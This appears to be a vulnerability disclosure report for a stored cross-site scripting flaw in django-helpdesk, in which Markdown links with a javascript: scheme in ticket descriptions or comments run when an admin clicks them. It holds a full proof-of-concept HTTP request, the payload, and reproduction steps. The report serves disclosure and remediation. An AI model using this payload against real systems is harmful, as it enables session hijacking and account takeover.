NoobpkBE7F211D-4BFD-44FD-91E8-682329906FBDCross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk
0.002 Low
EPSS
Percentile
56.6%
Description
Stored XSS via Markdown at Description or Comment of Ticket
Detail
When rendering to Markdown, the application does not filter and check the properties are valid, so when the user enters [XSS](javascript:alert(`document.domain`)) it will render as <a href>XSS</a> .
Proof of Concept
// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"
o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"
1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"
XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"
[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"
3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"
[email protected]
-----------------------------69350364819088505273728279714--
Step to Reproduce
Ticket
Goto URL without login to create a new ticket: https://[DOMAIN]/tickets/submit/
At field [Description of your issue input with payload: [XSS](javascript:alert(`document.domain`))
Comment Ticket
At field [Comment / Resolution] input with payload: [XSS](javascript:alert(`document.domain`))
The XSS will trigger when the admin click on the content of the description or the comment
Impact
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
Related
